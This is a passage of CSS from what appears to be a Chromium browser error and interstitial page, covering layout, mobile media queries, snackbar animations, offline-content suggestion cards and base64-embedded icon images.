}

.debugging-content {
  line-height: 1em;
  margin-bottom: 0;
  margin-top: 1em;
}

.debugging-content-fixed-width {
  display: block;
  font-family: monospace;
  font-size: 1.2em;
  margin-top: 0.5em;
}

.debugging-title {
  font-weight: bold;
}

#details {
  margin: 0 0 50px;
}

#details p:not(:first-of-type) {
  margin-top: 20px;
}

.secondary-button:active {
  border-color: white;
  box-shadow: 0 1px 2px 0 rgba(60, 64, 67, .3),
      0 2px 6px 2px rgba(60, 64, 67, .15);
}

.secondary-button:hover {
  background: var(--secondary-button-hover-fill-color);
  border-color: var(--secondary-button-hover-border-color);
  text-decoration: none;
}

.error-code {
  color: var(--error-code-color);
  font-size: .8em;
  margin-top: 12px;
  text-transform: uppercase;
}

#error-debugging-info {
  font-size: 0.8em;
}

h1 {
  color: var(--heading-color);
  font-size: 1.6em;
  font-weight: normal;
  line-height: 1.25em;
  margin-bottom: 16px;
}

h2 {
  font-size: 1.2em;
  font-weight: normal;
}

.icon {
  height: 72px;
  margin: 0 0 40px;
  width: 72px;
}

input[type=checkbox] {
  opacity: 0;
}

input[type=checkbox]:focus ~ .checkbox::after {
  outline: -webkit-focus-ring-color auto 5px;
}

.interstitial-wrapper {
  box-sizing: border-box;
  font-size: 1em;
  line-height: 1.6em;
  margin: 14vh auto 0;
  max-width: 600px;
  width: 100%;
}

#main-message > p {
  display: inline;
}

#extended-reporting-opt-in {
  font-size: .875em;
  margin-top: 32px;
}

#extended-reporting-opt-in label {
  display: grid;
  grid-template-columns: 1.8em 1fr;
  position: relative;
}

#enhanced-protection-message {
  border-radius: 4px;
  font-size: 1em;
  margin-top: 32px;
  padding: 10px 5px;
}

#enhanced-protection-message label {
  display: grid;
  grid-template-columns: 2.5em 1fr;
  position: relative;
}

#enhanced-protection-message div {
  margin: 0.5em;
}

#enhanced-protection-message .icon {
  height: 1.5em;
  vertical-align: middle;
  width: 1.5em;
}

.nav-wrapper {
  margin-top: 51px;
}

.nav-wrapper::after {
  clear: both;
  content: '';
  display: table;
  width: 100%;
}

.small-link {
  color: var(--small-link-color);
  font-size: .875em;
}

.checkboxes {
  flex: 0 0 24px;
}

.checkbox {
  --padding: .9em;
  background: transparent;
  display: block;
  height: 1em;
  left: -1em;
  padding-inline-start: var(--padding);
  position: absolute;
  right: 0;
  top: -.5em;
  width: 1em;
}

.checkbox::after {
  border: 1px solid white;
  border-radius: 2px;
  content: '';
  height: 1em;
  left: var(--padding);
  position: absolute;
  top: var(--padding);
  width: 1em;
}

.checkbox::before {
  background: transparent;
  border: 2px solid white;
  border-inline-end-width: 0;
  border-top-width: 0;
  content: '';
  height: .2em;
  left: calc(.3em + var(--padding));
  opacity: 0;
  position: absolute;
  top: calc(.3em  + var(--padding));
  transform: rotate(-45deg);
  width: .5em;
}

input[type=checkbox]:checked ~ .checkbox::before {
  opacity: 1;
}

#recurrent-error-message {
  background: #ededed;
  border-radius: 4px;
  margin-bottom: 16px;
  margin-top: 12px;
  padding: 12px 16px;
}

.showing-recurrent-error-message #extended-reporting-opt-in {
  margin-top: 16px;
}

.showing-recurrent-error-message #enhanced-protection-message {
  margin-top: 16px;
}

@media (max-width: 700px) {
  .interstitial-wrapper {
    padding: 0 10%;
  }

  #error-debugging-info {
    overflow: auto;
  }
}

@media (max-width: 420px) {
  button,
  [dir='rtl'] button,
  .small-link {
    float: none;
    font-size: .825em;
    font-weight: 500;
    margin: 0;
    width: 100%;
  }

  button {
    padding: 16px 24px;
  }

  #details {
    margin: 20px 0 20px 0;
  }

  #details p:not(:first-of-type) {
    margin-top: 10px;
  }

  .secondary-button:not(.hidden) {
    display: block;
    margin-top: 20px;
    text-align: center;
    width: 100%;
  }

  .interstitial-wrapper {
    padding: 0 5%;
  }

  #extended-reporting-opt-in {
    margin-top: 24px;
  }

  #enhanced-protection-message {
    margin-top: 24px;
  }

  .nav-wrapper {
    margin-top: 30px;
  }
}

/**
 * Mobile specific styling.
 * Navigation buttons are anchored to the bottom of the screen.
 * Details message replaces the top content in its own scrollable area.
 */

@media (max-width: 420px) {
  .nav-wrapper .secondary-button {
    border: 0;
    margin: 16px 0 0;
    margin-inline-end: 0;
    padding-bottom: 16px;
    padding-top: 16px;
  }
}

/* Fixed nav. */
@media (min-width: 240px) and (max-width: 420px) and
       (min-height: 401px),
       (min-width: 421px) and (min-height: 240px) and
       (max-height: 560px) {
  body .nav-wrapper {
    background: var(--background-color);
    bottom: 0;
    box-shadow: 0 -12px 24px var(--background-color);
    left: 0;
    margin: 0 auto;
    max-width: 736px;
    padding-inline-end: 24px;
    padding-inline-start: 24px;
    position: fixed;
    right: 0;
    width: 100%;
    z-index: 2;
  }

  .interstitial-wrapper {
    max-width: 736px;
  }

  #details,
  #main-content {
    padding-bottom: 40px;
  }

  #details {
    padding-top: 5.5vh;
  }

  button.small-link {
    color: var(--google-blue-600);
  }
}

@media (max-width: 420px) and (orientation: portrait),
       (max-height: 560px) {
  body {
    margin: 0 auto;
  }

  button,
  [dir='rtl'] button,
  button.small-link,
  .nav-wrapper .secondary-button {
    font-family: Roboto-Regular,Helvetica;
    font-size: .933em;
    margin: 6px 0;
    transform: translatez(0);
  }

  .nav-wrapper {
    box-sizing: border-box;
    padding-bottom: 8px;
    width: 100%;
  }

  #details {
    box-sizing: border-box;
    height: auto;
    margin: 0;
    opacity: 1;
    transition: opacity 250ms cubic-bezier(0.4, 0, 0.2, 1);
  }

  #details.hidden,
  #main-content.hidden {
    height: 0;
    opacity: 0;
    overflow: hidden;
    padding-bottom: 0;
    transition: none;
  }

  h1 {
    font-size: 1.5em;
    margin-bottom: 8px;
  }

  .icon {
    margin-bottom: 5.69vh;
  }

  .interstitial-wrapper {
    box-sizing: border-box;
    margin: 7vh auto 12px;
    padding: 0 24px;
    position: relative;
  }

  .interstitial-wrapper p {
    font-size: .95em;
    line-height: 1.61em;
    margin-top: 8px;
  }

  #main-content {
    margin: 0;
    transition: opacity 100ms cubic-bezier(0.4, 0, 0.2, 1);
  }

  .small-link {
    border: 0;
  }

  .suggested-left > #control-buttons,
  .suggested-right > #control-buttons {
    float: none;
    margin: 0;
  }
}

@media (min-width: 421px) and (min-height: 500px) and (max-height: 560px) {
  .interstitial-wrapper {
    margin-top: 10vh;
  }
}

@media (min-height: 400px) and (orientation:portrait) {
  .interstitial-wrapper {
    margin-bottom: 145px;
  }
}

@media (min-height: 299px) {
  .nav-wrapper {
    padding-bottom: 16px;
  }
}

@media (max-height: 560px) and (min-height: 240px) and (orientation:landscape) {
  .extended-reporting-has-checkbox #details {
    padding-bottom: 80px;
  }
}

@media (min-height: 500px) and (max-height: 650px) and (max-width: 414px) and
       (orientation: portrait) {
  .interstitial-wrapper {
    margin-top: 7vh;
  }
}

@media (min-height: 650px) and (max-width: 414px) and (orientation: portrait) {
  .interstitial-wrapper {
    margin-top: 10vh;
  }
}

/* Small mobile screens. No fixed nav. */
@media (max-height: 400px) and (orientation: portrait),
       (max-height: 239px) and (orientation: landscape),
       (max-width: 419px) and (max-height: 399px) {
  .interstitial-wrapper {
    display: flex;
    flex-direction: column;
    margin-bottom: 0;
  }

  #details {
    flex: 1 1 auto;
    order: 0;
  }

  #main-content {
    flex: 1 1 auto;
    order: 0;
  }

  .nav-wrapper {
    flex: 0 1 auto;
    margin-top: 8px;
    order: 1;
    padding-inline-end: 0;
    padding-inline-start: 0;
    position: relative;
    width: 100%;
  }

  button,
  .nav-wrapper .secondary-button {
    padding: 16px 24px;
  }

  button.small-link {
    color: var(--google-blue-600);
  }
}

@media (max-width: 239px) and (orientation: portrait) {
  .nav-wrapper {
    padding-inline-end: 0;
    padding-inline-start: 0;
  }
}
</style>
  <style>/* Copyright 2013 The Chromium Authors
 * Use of this source code is governed by a BSD-style license that can be
 * found in the LICENSE file. */

/* Don't use the main frame div when the error is in a subframe. */
html[subframe] #main-frame-error {
  display: none;
}

/* Don't use the subframe error div when the error is in a main frame. */
html:not([subframe]) #sub-frame-error {
  display: none;
}

h1 {
  margin-top: 0;
  word-wrap: break-word;
}

h1 span {
  font-weight: 500;
}

a {
  text-decoration: none;
}

.icon {
  -webkit-user-select: none;
  display: inline-block;
}

.icon-generic {
  /* Can't access chrome://theme/IDR_ERROR_NETWORK_GENERIC from an untrusted
   * renderer process, so embed the resource manually. */
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIAQMAAABvIyEEAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAENJREFUeF7tzbEJACEQRNGBLeAasBCza2lLEGx0CxFGG9hBMDDxRy/72O9FMnIFapGylsu1fgoBdkXfUHLrQgdfrlJN1BdYBjQQm3UAAAAASUVORK5CYII=) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJAAAACQAQMAAADdiHD7AAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAFJJREFUeF7t0cENgDAMQ9FwYgxG6WjpaIzCCAxQxVggFuDiCvlLOeRdHR9yzjncHVoq3npu+wQUrUuJHylSTmBaespJyJQoObUeyxDQb3bEm5Au81c0pSCD8HYAAAAASUVORK5CYII=) 2x);
}

.icon-offline {
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIAQMAAABvIyEEAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAGxJREFUeF7tyMEJwkAQRuFf5ipMKxYQiJ3Z2nSwrWwBA0+DQZcdxEOueaePp9+dQZFB7GpUcURSVU66yVNFj6LFICatThZB6r/ko/pbRpUgilY0Cbw5sNmb9txGXUKyuH7eV25x39DtJXUNPQGJtWFV+BT/QAAAAABJRU5ErkJggg==) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJAAAACQBAMAAAAVaP+LAAAAGFBMVEUAAABTU1NNTU1TU1NPT09SUlJSUlJTU1O8B7DEAAAAB3RSTlMAoArVKvVgBuEdKgAAAJ1JREFUeF7t1TEOwyAMQNG0Q6/UE+RMXD9d/tC6womIFSL9P+MnAYOXeTIzMzMzMzMzaz8J9Ri6HoITmuHXhISE8nEh9yxDh55aCEUoTGbbQwjqHwIkRAEiIaG0+0AA9VBMaE89Rogeoww936MQrWdBr4GN/z0IAdQ6nQ/FIpRXDwHcA+JIJcQowQAlFUA0MfQpXLlVQfkzR4igS6ENjknm/wiaGhsAAAAASUVORK5CYII=) 2x);
  position: relative;
}

.icon-disabled {
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAHAAAABICAMAAAAZF4G5AAAABlBMVEVMaXFTU1OXUj8tAAAAAXRSTlMAQObYZgAAASZJREFUeAHd11Fq7jAMRGGf/W/6PoWB67YMqv5DybwG/CFjRuR8JBw3+ByiRjgV9W/TJ31P0tBfC6+cj1haUFXKHmVJo5wP98WwQ0ZCbfUc6LQ6VuUBz31ikADkLMkDrfUC4rR6QGW+gF6rx7NaHWCj1Y/W6lf4L7utvgBSt3rBFSS/XBMPUILcJINHCBWYUfpWn4NBi1ZfudIc3rf6/NGEvEA+AsYTJozmXemjXeLZAov+mnkN2HfzXpMSVQDnGw++57qNJ4D1xitA2sJ+VAWMygSEaYf2mYPTjZfk2K8wmP7HLIH5Mg4/pP+PEcDzUvDMvYbs/2NWwPO5vBdMZE4EE5UTQLiBFDaUlTDPBRoJ9HdAYIkIo06og3BNXtCzy7zA1aXk5x+tJARq63eAygAAAABJRU5ErkJggg==) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAOAAAACQAQMAAAArwfVjAAAABlBMVEVMaXFTU1OXUj8tAAAAAXRSTlMAQObYZgAAAYdJREFUeF7F1EFqwzAUBNARAmVj0FZe5QoBH6BX+dn4GlY2PYNzGx/A0CvkCIJuvIraKJKbgBvzf2g62weDGD7CYggpfFReis4J0ey9EGFIiEQQojFSlA9kSIiqd0KkFjKsewgRbStEN19mxUPTtmW9HQ/h6tyqNQ8NlSMZdzyE6qkoE0trVYGFm0n1WYeBhduzwbwBC7voS+vIxfeMjeaiLxsMMtQNwMPtuew+DjzcTHk8YMfDknEcIUOtf2lVfgVH3K4Xv5PRYAXRVMtItIJ3rfaCIVn9DsTH2NxisAVRex2Hh3hX+/mRUR08bAwPEYsI51ZxWH4Q0SpicQRXeyEaIug48FEdegARfMz/tADVsRciwTAxW308ehmC2gLraC+YCbV3QoTZexa+zegAEW5PhhgYfmbvJgcRqngGByOSXdFJcLk2JeDPEN0kxe1JhIt5FiFA+w+ItMELsUyPF2IaJ4aILqb4FbxPwhImwj6JauKgDUCYaxmYIsd4KXdMjIC9ItB5Bn4BNRwsG0XM2nwAAAAASUVORK5CYII=) 2x);
  width: 112px;
}

.hidden {
  display: none;
}

#suggestions-list a {
  color: var(--google-blue-600);
}

#suggestions-list p {
  margin-block-end: 0;
}

#suggestions-list ul {
  margin-top: 0;
}

.single-suggestion {
  list-style-type: none;
  padding-inline-start: 0;
}

#error-information-button {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBmaWxsPSJub25lIiBkPSJNMCAwaDI0djI0SDB6Ii8+PHBhdGggZD0iTTExIDE4aDJ2LTJoLTJ2MnptMS0xNkM2LjQ4IDIgMiA2LjQ4IDIgMTJzNC40OCAxMCAxMCAxMCAxMC00LjQ4IDEwLTEwUzE3LjUyIDIgMTIgMnptMCAxOGMtNC40MSAwLTgtMy41OS04LThzMy41OS04IDgtOCA4IDMuNTkgOCA4LTMuNTkgOC04IDh6bTAtMTRjLTIuMjEgMC00IDEuNzktNCA0aDJjMC0xLjEuOS0yIDItMnMyIC45IDIgMmMwIDItMyAxLjc1LTMgNWgyYzAtMi4yNSAzLTIuNSAzLTUgMC0yLjIxLTEuNzktNC00LTR6Ii8+PC9zdmc+);
  height: 24px;
  vertical-align: -.15em;
  width: 24px;
}

.use-popup-container#error-information-popup-container
  #error-information-popup {
  align-items: center;
  background-color: var(--popup-container-background-color);
  display: flex;
  height: 100%;
  left: 0;
  position: fixed;
  top: 0;
  width: 100%;
  z-index: 100;
}

.use-popup-container#error-information-popup-container
  #error-information-popup-content > p {
  margin-bottom: 11px;
  margin-inline-start: 20px;
}

.use-popup-container#error-information-popup-container #suggestions-list ul {
  margin-inline-start: 15px;
}

.use-popup-container#error-information-popup-container
  #error-information-popup-box {
  background-color: var(--background-color);
  left: 5%;
  padding-bottom: 15px;
  padding-top: 15px;
  position: fixed;
  width: 90%;
  z-index: 101;
}

.use-popup-container#error-information-popup-container div.error-code {
  margin-inline-start: 20px;
}

.use-popup-container#error-information-popup-container #suggestions-list p {
  margin-inline-start: 20px;
}

:not(.use-popup-container)#error-information-popup-container
  #error-information-popup-close {
  display: none;
}

#error-information-popup-close {
  margin-bottom: 0;
  margin-inline-end: 35px;
  margin-top: 15px;
  text-align: end;
}

.link-button {
  color: rgb(66, 133, 244);
  display: inline-block;
  font-weight: bold;
  text-transform: uppercase;
}

#sub-frame-error-details {
  color: #8F8F8F;

  /* Not done on mobile for performance reasons. */
  text-shadow: 0 1px 0 rgba(255,255,255,0.3);
}

[jscontent=hostName],
[jscontent=failedUrl] {
  overflow-wrap: break-word;
}

.secondary-button {
  background: #d9d9d9;
  color: #696969;
  margin-inline-end: 16px;
}

.snackbar {
  background: #323232;
  border-radius: 2px;
  bottom: 24px;
  box-sizing: border-box;
  color: #fff;
  font-size: .87em;
  left: 24px;
  max-width: 568px;
  min-width: 288px;
  opacity: 0;
  padding: 16px 24px 12px;
  position: fixed;
  transform: translateY(90px);
  will-change: opacity, transform;
  z-index: 999;
}

.snackbar-show {
  -webkit-animation:
    show-snackbar 250ms cubic-bezier(0, 0, 0.2, 1) forwards,
    hide-snackbar 250ms cubic-bezier(0.4, 0, 1, 1) forwards 5s;
}

@-webkit-keyframes show-snackbar {
  100% {
    opacity: 1;
    transform: translateY(0);
  }
}

@-webkit-keyframes hide-snackbar {
  0% {
    opacity: 1;
    transform: translateY(0);
  }
  100% {
    opacity: 0;
    transform: translateY(90px);
  }
}

.suggestions {
  margin-top: 18px;
}

.suggestion-header {
  font-weight: bold;
  margin-bottom: 4px;
}

.suggestion-body {
  color: #777;
}

/* Decrease padding at low sizes. */
@media (max-width: 640px), (max-height: 640px) {
  h1 {
    margin: 0 0 15px;
  }
  .suggestions {
    margin-top: 10px;
  }
  .suggestion-header {
    margin-bottom: 0;
  }
}

#download-link,
#download-link-clicked {
  margin-bottom: 30px;
  margin-top: 30px;
}

#download-link-clicked {
  color: #BBB;
}

#download-link::before,
#download-link-clicked::before {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxLjJlbSIgaGVpZ2h0PSIxLjJlbSIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNNSAyMGgxNHYtMkg1bTE0LTloLTRWM0g5djZINWw3IDcgNy03eiIgZmlsbD0iIzQyODVGNCIvPjwvc3ZnPg==);
  display: inline-block;
  margin-inline-end: 4px;
  vertical-align: -webkit-baseline-middle;
}

#download-link-clicked::before {
  opacity: 0;
  width: 0;
}

#offline-content-list-visibility-card {
  border: 1px solid white;
  border-radius: 8px;
  display: flex;
  font-size: .8em;
  justify-content: space-between;
  line-height: 1;
}

#offline-content-list.list-hidden #offline-content-list-visibility-card {
  border-color: rgb(218, 220, 224);
}

#offline-content-list-visibility-card > div {
  padding: 1em;
}

#offline-content-list-title {
  color: var(--google-gray-700);
}

#offline-content-list-show-text,
#offline-content-list-hide-text {
  color: rgb(66, 133, 244);
}

/* Hides the "hide" text div when the offline content list is collapsed/hidden
 * and, alternatively, hides the "show" text div when the offline content list
 * is expanded/shown.
 */
#offline-content-list.list-hidden #offline-content-list-hide-text,
#offline-content-list:not(.list-hidden) #offline-content-list-show-text {
  display: none;
}

/* Controls the animation of the offline content list when it is expanded/shown.
 */
#offline-content-suggestions {
  /* Max-height has to be set for the height animation to work. The chosen value
   * is a little greater than the maximum height the list will have, when all
   * suggestions have images, so that it is never clamped. This makes so that
   * when the actual height is smaller then the animation is not as smooth.
   */
  max-height: 27em;
  transition: max-height 200ms ease-in, visibility 0s 200ms,
              opacity 200ms 200ms linear;
}

/* Controls the animation of the offline content list when it is
 * collapsed/hidden.
 */
#offline-content-list.list-hidden #offline-content-suggestions {
  max-height: 0;
  opacity: 0;
  transition: opacity 200ms linear, visibility 0s 200ms,
              max-height 200ms 200ms ease-out;
  visibility: hidden;
}

#offline-content-list {
  margin-inline-start: -5%;
  width: 110%;
}

/* The selectors below adjust the "overflow" of the suggestion cards contents
 * based on the same screen size based strategy used for the main frame, which
 * is applied by the `interstitial-wrapper` class. */
@media (max-width: 420px) {
  #offline-content-list {
    margin-inline-start: -2.5%;
    width: 105%;
  }
}
@media (max-width: 420px) and (orientation: portrait),
       (max-height: 560px) {
  #offline-content-list {
    margin-inline-start: -12px;
    width: calc(100% + 24px);
  }
}

.suggestion-with-image .offline-content-suggestion-thumbnail {
  flex-basis: 8.2em;
  flex-shrink: 0;
}

.suggestion-with-image .offline-content-suggestion-thumbnail > img {
  height: 100%;
  width: 100%;
}

.suggestion-with-image #offline-content-list:not(.is-rtl)
.offline-content-suggestion-thumbnail > img {
  border-bottom-right-radius: 7px;
  border-top-right-radius: 7px;
}

.suggestion-with-image #offline-content-list.is-rtl
.offline-content-suggestion-thumbnail > img {
  border-bottom-left-radius: 7px;
  border-top-left-radius: 7px;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail {
  align-items: center;
  display: flex;
  justify-content: center;
  min-height: 4.2em;
  min-width: 4.2em;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail > div {
  align-items: center;
  background-color: rgb(241, 243, 244);
  border-radius: 50%;
  display: flex;
  height: 2.3em;
  justify-content: center;
  width: 2.3em;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail > div > img {
  height: 1.45em;
  width: 1.45em;
}

.offline-content-suggestion-favicon {
  height: 1em;
  margin-inline-end: 0.4em;
  width: 1.4em;
}

.offline-content-suggestion-favicon > img {
  height: 1.4em;
  width: 1.4em;
}

.no-favicon .offline-content-suggestion-favicon {
  display: none;
}

.image-video {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTcgMTAuNVY3YTEgMSAwIDAgMC0xLTFINGExIDEgMCAwIDAtMSAxdjEwYTEgMSAwIDAgMCAxIDFoMTJhMSAxIDAgMCAwIDEtMXYtMy41bDQgNHYtMTFsLTQgNHoiIGZpbGw9IiMzQzQwNDMiLz48L3N2Zz4=);
}

.image-music-note {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTIgM3Y5LjI2Yy0uNS0uMTctMS0uMjYtMS41LS4yNkM4IDEyIDYgMTQgNiAxNi41UzggMjEgMTAuNSAyMXM0LjUtMiA0LjUtNC41VjZoNFYzaC03eiIgZmlsbD0iIzNDNDA0MyIvPjwvc3ZnPg==);
}

.image-earth {
  content: url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJNMTIgMmM1LjUyIDAgMTAgNC40OCAxMCAxMHMtNC40OCAxMC0xMCAxMFMyIDE3LjUyIDIgMTIgNi40OCAyIDEyIDJ6TTQgMTJoNC40YzMuNDA3LjAyMiA0LjkyMiAxLjczIDQuNTQzIDUuMTI3SDkuNDg4djIuNDdhOC4wMDQgOC4wMDQgMCAwIDAgMTAuNDk4LTguMDgzQzE5LjMyNyAxMi41MDQgMTguMzMyIDEzIDE3IDEzYy0yLjEzNyAwLTMuMjA2LS45MTYtMy4yMDYtMi43NWgtMy43NDhjLS4yNzQtMi43MjguNjgzLTQuMDkyIDIuODctNC4wOTIgMC0uOTc1LjMyNy0xLjU5Ny44MTEtMS45N0E4LjAwNCA4LjAwNCAwIDAgMCA0IDEyeiIgZmlsbD0iIzNDNDA0MyIvPjwvc3ZnPg==);
}

.image-file {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTMgOVYzLjVMMTguNSA5TTYgMmMtMS4xMSAwLTIgLjg5LTIgMnYxNmEyIDIgMCAwIDAgMiAyaDEyYTIgMiAwIDAgMCAyLTJWOGwtNi02SDZ6IiBmaWxsPSIjM0M0MDQzIi8+PC9zdmc+);
}

.offline-content-suggestion-texts {
  display: flex;
  flex-direction: column;
  justify-content: space-between;
  line-height: 1.3;
  padding: .9em;
  width: 100%;
}

.offline-content-suggestion-title {
  -webkit-box-orient: vertical;
  -webkit-line-clamp: 3;
  color: rgb(32, 33, 36);
  display: -webkit-box;
  font-size: 1.1em;
  overflow: hidden;
  text-overflow: ellipsis;
}

div.offline-content-suggestion {
  align-items: stretch;
  border: 1px solid rgb(218, 220, 224);
  border-radius: 8px;
  display: flex;
  justify-content: space-between;
  margin-bottom: .8em;
}

.suggestion-with-image {
  flex-direction: row;
  height: 8.2em;
  max-height: 8.2em;
}

.suggestion-with-icon {
  flex-direction: row-reverse;
  height: 4.2em;
  max-height: 4.2em;
}

.suggestion-with-icon .offline-content-suggestion-title {
  -webkit-line-clamp: 1;
  word-break: break-all;
}

.suggestion-with-icon .offline-content-suggestion-texts {
  padding-inline-start: 0;
}

.offline-content-suggestion-attribution-freshness {
  color: rgb(95, 99, 104);
  display: flex;
  font-size: .8em;
  line-height: 1.7em;
}

.offline-content-suggestion-attribution {
  -webkit-box-orient: vertical;
  -webkit-line-clamp: 1;
  display: -webkit-box;
  flex-shrink: 1;
  margin-inline-end: 0.3em;
  overflow: hidden;
  overflow-wrap: break-word;
  text-overflow: ellipsis;
  word-break: break-all;
}

.no-attribution .offline-content-suggestion-attribution {
  display: none;
}

.offline-content-suggestion-freshness::before {
  content: '-';
  display: inline-block;
  flex-shrink: 0;
  margin-inline-end: .1em;
  margin-inline-start: .1em;
}

.no-attribution .offline-content-suggestion-freshness::before {
  display: none;
}

.offline-content-suggestion-freshness {
  flex-shrink: 0;
}

.suggestion-with-image .offline-content-suggestion-pin-spacer {
  flex-grow: 100;
  flex-shrink: 1;
}

.suggestion-with-image .offline-content-suggestion-pin {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCI+PGRlZnM+PHBhdGggaWQ9ImEiIGQ9Ik0wIDBoMjR2MjRIMFYweiIvPjwvZGVmcz48Y2xpcFBhdGggaWQ9ImIiPjx1c2UgeGxpbms6aHJlZj0iI2EiIG92ZXJmbG93PSJ2aXNpYmxlIi8+PC9jbGlwUGF0aD48cGF0aCBjbGlwLXBhdGg9InVybCgjYikiIGQ9Ik0xMiAyQzYuNSAyIDIgNi41IDIgMTJzNC41IDEwIDEwIDEwIDEwLTQuNSAxMC0xMFMxNy41IDIgMTIgMnptNSAxNkg3di0yaDEwdjJ6bS02LjctNEw3IDEwLjdsMS40LTEuNCAxLjkgMS45IDUuMy01LjNMMTcgNy4zIDEwLjMgMTR6IiBmaWxsPSIjOUFBMEE2Ii8+PC9zdmc+);
  flex-shrink: 0;
  height: 1.4em;
  margin-inline-start: .4em;
  width: 1.4em;
}

/* Controls the animation (and a bit more) of the launch-downloads-home action
 * button when the offline content list is expanded/shown.
 */
#offline-content-list-action {
  text-align: center;
  transition: visibility 0s 200ms, opacity 200ms 200ms linear;
}

/* Controls the animation of the launch-downloads-home action button when the
 * offline content list is collapsed/hidden.
 */
#offline-content-list.list-hidden #offline-content-list-action {
  opacity: 0;
  transition: opacity 200ms linear, visibility 0s 200ms;
  visibility: hidden;
}

#cancel-save-page-button {
  background-image: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0IiBoZWlnaHQ9IjI0Ij48Y2xpcFBhdGggaWQ9Im1hc2siPjxwYXRoIGQ9Ik0xMiAyQzYuNSAyIDIgNi41IDIgMTJzNC41IDEwIDEwIDEwIDEwLTQuNSAxMC0xMFMxNy41IDIgMTIgMnptNSAxNkg3di0yaDEwdjJ6bS02LjctNEw3IDEwLjdsMS40LTEuNCAxLjkgMS45IDUuMy01LjNMMTcgNy4zIDEwLjMgMTR6IiBmaWxsPSIjOUFBMEE2Ii8+PC9jbGlwUGF0aD48cGF0aCBjbGlwLXBhdGg9InVybCgjbWFzaykiIGZpbGw9IiM5QUEwQTYiIGQ9Ik0wIDBoMjR2MjRIMHoiLz48cGF0aCBjbGlwLXBhdGg9InVybCgjbWFzaykiIGZpbGw9IiMxQTczRTgiIHN0eWxlPSJhbmltYXRpb246b2ZmbGluZUFuaW1hdGlvbiA0cyBpbmZpbml0ZSIgZD0iTTAgMGgyNHYyNEgweiIvPjxzdHlsZT5Aa2V5ZnJhbWVzIG9mZmxpbmVBbmltYXRpb257MCUsMzUle2hlaWdodDowfTYwJXtoZWlnaHQ6MTAwJX05MCV7ZmlsbC1vcGFjaXR5OjF9dG97ZmlsbC1vcGFjaXR5OjB9fTwvc3R5bGU+PC9zdmc+);
  background-position: right 27px center;
  background-repeat: no-repeat;
  border: 1px solid var(--google-gray-300);
  border-radius: 5px;
  color: var(--google-gray-700);
  margin-bottom: 26px;
  padding-bottom: 16px;
  padding-inline-end: 88px;
  padding-inline-start: 16px;
  padding-top: 16px;
  text-align: start;
}

html[dir='rtl'] #cancel-save-page-button {
  background-position: left 27px center;
}

#save-page-for-later-button {
  display: flex;
  justify-content: start;
}

#save-page-for-later-button a::before {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxLjJlbSIgaGVpZ2h0PSIxLjJlbSIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNNSAyMGgxNHYtMkg1bTE0LTloLTRWM0g5djZINWw3IDcgNy03eiIgZmlsbD0iIzQyODVGNCIvPjwvc3ZnPg==);
  display: inline-block;
  margin-inline-end: 4px;
  vertical-align: -webkit-baseline-middle;
}

.hidden#save-page-for-later-button {
  display: none;
}

/* Don't allow overflow when in a subframe. */
html[subframe] body {
  overflow: hidden;
}

#sub-frame-error {
  -webkit-align-items: center;
  -webkit-flex-flow: column;
  -webkit-justify-content: center;
  background-color: #DDD;
  display: -webkit-flex;
  height: 100%;
  left: 0;
  position: absolute;
  text-align: center;
  top: 0;
  transition: background-color 200ms ease-in-out;
  width: 100%;
}

#sub-frame-error:hover {
  background-color: #EEE;
}

#sub-frame-error .icon-generic {
